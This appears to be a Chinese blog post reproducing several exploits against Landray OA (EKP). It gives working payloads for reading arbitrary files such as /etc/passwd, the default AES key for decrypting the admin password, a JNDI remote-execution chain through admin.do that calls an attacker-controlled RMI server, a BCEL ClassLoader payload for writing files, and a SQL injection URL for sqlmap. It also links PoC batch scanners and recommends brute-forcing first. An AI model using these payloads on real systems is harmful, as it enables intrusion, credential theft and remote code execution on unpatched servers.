蓝凌OA漏洞复现

已于 2023-01-13 11:37:28 修改
阅读量2.7w 收藏 23
点赞数 8
分类专栏: 渗透 文章标签: 安全
于 2021-12-13 00:18:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xd_2021/article/details/121893236
版权

目录

前言

又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA

任意文件读取漏洞

漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。

漏洞复现

访问/sys/ui/extend/varkind/custom.jsp,抓包并修改为POST,并加上payload(var={“body”:{“file”:“file:///etc/passwd”}}),在此进行发包
在这里插入图片描述
但是嘛,保不齐人家不是linux系统,所以不要试完这个payload读不出来,就代表它不存在漏洞

批量扫描POC

在github:https://github.com/Xd-tl/Landray-POC,需要请自取
在这里插入图片描述

SSRF+JNDI远程命令执行

漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限

漏洞复现

利用任意文件读取/WEB-INF/KmssConfig/admin.properties配置文件
在这里插入图片描述
获得password,由于蓝凌OA默认是AES加密,且 默认密钥为 kmssAdminKey,所以只要拿着password进行解密就好(返回的password字符串去掉末尾的/r在进行解密)
在这里插入图片描述
拿到密码了发现是个弱密码这这这,竟然忘了爆破,势必得进一波后台啦,不然那就可太亏了,这都快2022年了,不会还有人不知道后台地址把,竟然是我不知道,大意了,赶紧百度一下,原来是久违的admin.do
在这里插入图片描述
利用burp对其抓包,并修改为POST,在加上payloadmethod=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:xxxx/cbdsdg
,现在我们先构造恶意的exp,类似于dnslog

在这里插入图片描述
对其进行编译,并让其兼容1.7
在这里插入图片描述
在把生成的exp.class文件放到我们服务器上,在使用marshalsec工具(https://github.com/mbechler/marshalsec)构建一个JNDI服务
在这里插入图片描述
最后就是发送payload
在这里插入图片描述
最后看服务器的记录,由于本地没有success文件所以会报404,但是目标是请求了咱的服务器,
在这里插入图片描述
说明成功执行了咱们的命令

任意文件写入漏洞

漏洞描述

蓝凌OA 存在任意文件写入漏洞,攻击者可以上传恶意文件

漏洞复现

在上面的任意文件读取漏洞中,修改其payload为var={“body”:{“file”:“/sys/search/sys_search_main/sysSearchMain.do?method=editParam”}}&fdParemNames=11&fdParameters=[shellcode]即可
在shellcode位置补上,发包即可

<java>
<void class="com.sun.org.apache.bcel.internal.util.ClassLoader">
	<void method="loadClass">
		<string>$$BCEL$$......</string>
		<void method="newInstance"></void>
	</void>
</void>
</java>

有关详细操作,在我的Java安全专栏里面的BCEL Classloader(https://blog.csdn.net/xd_2021/article/details/121878806)文章里面最后复现了一个,该文章讲BCEL的,有兴趣的可以看看,关于BCEL编码工具我也是写了一个在github上(https://github.com/Xd-tl/BCELCode)

批量扫描POC

在github:https://github.com/Xd-tl/Landray-POC,需要请自取
在这里插入图片描述

EKP后台SQL注入

漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

漏洞复现

漏洞urlhttps://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
访问该url并对其抓包,拿到包后保存到文件里面,利用sqlmap -r即可

总结

最后也是全部复现完了,也让我明白爆破的重要性,先爆,爆不出,在走正常路子

大家可以关注菜鸡的公众号,有什么好想法也可以让我学习一下,有什么问题可以一块解决,由于二维码违规,下面是base64编码的文字

5b6u5L+h5YWs5LyX5Y+34oCc5a6J5YWo5re35a2Q4oCd77yM5Y+v5Lul55So5b6u5L+h5pCc5LiA5pCc77yM5q2j5Zyo5a6M5ZaE5LitLi4uLi4u

安全混子
关注
  • 8
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
蓝凌OA sysUiComponent 任意文件上传漏洞复现
0xSec
11-16 2958
蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。蓝凌OA sysUiComponent接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4719
以通达OA系统11.2版本为案例的Web渗透
1day 蓝凌OA EIS EKP 30多个漏洞合集(含payload利用)攻防必备漏洞
最新发布
weixin_43167326的博客
06-24 1432
蓝凌OA是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌OA能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌OA还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌OA还提供丰富的。
【nday】HVV 蓝凌OA合集
伏一
05-28 563
运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)验证POC,利用 custom.jsp 文件导致前台的命令执行以及文件上传,发送请求执行命令。获取password后,使用 DES方法 解密,默认密钥为。app="Landray-OA系统"app="Landray-OA系统"app="Landray-OA系统"app="Landray-OA系统"验证POC,出现漏洞的文件为 custom.jsp。app="Landray-OA系统"蓝凌EIS 智慧协同平台。
蓝凌(Landray)OA漏洞常见RCE
热门推荐
qq_53385700的博客
01-12 1万+
蓝凌OA常见RCE的poc
漏洞复现蓝凌OA treexml.tmpl 远程命令执行漏洞
qq_34914659的博客
06-14 2996
漏洞复现蓝凌OA treexml.tmpl 远程命令执行漏洞
复现蓝凌OA SQL注入漏洞_61
fushuang333的博客
02-29 1161
复现蓝凌OA SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
蓝凌OA系统V15.0管理员手册.zip
07-08
蓝凌OA系统V15.0是一款针对企业日常办公自动化需求设计的高效管理工具,它为企业提供了一整套流程审批、文档管理、协同工作、信息门户等核心功能,旨在提升企业的办公效率,优化业务流程。作为系统管理员或运维人员...
蓝凌OA产品V14系统安装维护手册.chm
07-04
蓝凌OA产品V14系统安装维护手册.chm
蓝凌OA系统排名?蓝凌OA办公系统怎么选?什么是用户口碑最好的蓝凌OA系统?
04-13
提到OA选型,难免不会提到蓝凌蓝凌OA怎么样?蓝凌OA有哪些优缺点?蓝凌OA用户口碑怎么样? 想了解这些信息,您应该到选型宝,B2B的大众点评,看看用户对蓝凌OA产品的实名点评。 关于蓝凌OA,以下信息来自选型宝...
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
启动蓝凌OA项目的全步骤.md
07-11
公司用的oa项目的启动和初始化步骤。
蓝凌OA wechatloginhelper sql注入漏洞
weixin_52204925的博客
02-27 1284
蓝凌智能OA是一款针对中小企业的移动化智能办公产品 ,融合了钉钉数字化能力与蓝凌多年OA产品与服务经验,能全面满足企业日常办公在线、企业文化在线、客户管理在线、人事服务在线、行政务服务在线等需求。 蓝凌OA wechatLoginHelper.do接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器敏感信息或权限。导致服务器失陷
蓝凌OA存在任意文件读取漏洞
nnn2188185的博客
06-15 520
蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce
漏洞复现-蓝凌LandrayOA系列
aming小老弟
03-08 1562
LandrayOA_sysSearchMain_Rce漏洞。LandrayOA_Custom_SSRF_JNDI漏洞。LandrayOA_Custom_FileRead漏洞
漏洞复现蓝凌OA wechatLoginHelper存在SQL注入漏洞
失心少年
02-29 321
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业。蓝凌OA存在SQL注入漏洞。SQLMP 也可以直接跑。
N!9个OA高危漏洞利用工具v1.1.6
潇湘信安的博客
07-16 840
该工具使用了ExpDemo-JavaFX项目,保留了核心的数据包请求接口,使用jdk1.8环境开发。目前只编写了oa系列,对相关漏洞进行复现和分析,极力避免exp的误报和有效性。
蓝凌OA sysUiExtend.do 任意文件上传漏洞
weixin_52204925的博客
01-25 2478
蓝凌OA sysUiExtend.do 任意文件上传漏洞
蓝凌oa漏洞检测工具
07-28
很抱歉,我无法提供关于蓝凌OA漏洞检测工具的信息。 #### 引用[.reference_title] - *1* [蓝凌(Landray)OA漏洞常见RCE](https://blog.csdn.net/qq_53385700/article/details/128650811)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [蓝凌OA前台任意文件读取漏洞利用](https://blog.csdn.net/wangxueying5172/article/details/119429287)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全混子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值